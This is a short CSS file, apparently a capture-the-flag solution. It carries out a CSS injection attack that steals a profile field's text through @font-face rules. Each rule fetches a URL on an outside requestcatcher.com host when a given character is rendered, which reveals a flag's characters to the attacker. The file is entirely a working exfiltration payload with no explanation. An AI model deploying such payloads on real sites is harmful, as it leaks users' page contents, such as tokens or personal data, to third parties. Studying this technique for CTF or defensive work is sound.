@charset "UTF-8";

.profile-info .profile-row:nth-child(4) .value {
    font-family: attack !important;
    font-size: 16px;
    display: inline;
}

@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?v');
    unicode-range: U+0076;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?k');
    unicode-range: U+006B;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?a');
    unicode-range: U+0061;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?%7B');
    unicode-range: U+007B;
}

@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?g');
    unicode-range: U+0067;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?h');
    unicode-range: U+0068;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?o');
    unicode-range: U+006F;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?s');
    unicode-range: U+0073;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?t');
    unicode-range: U+0074;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?_');
    unicode-range: U+005F;
}

@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?p');
    unicode-range: U+0070;
}

@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?i');
    unicode-range: U+0069;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?x');
    unicode-range: U+0078;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?e');
    unicode-range: U+0065;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?l');
    unicode-range: U+006C;
}
@font-face {
    font-family: attack;
    src: url('https://css_task.requestcatcher.com/flag?%7D');
    unicode-range: U+007D;
}




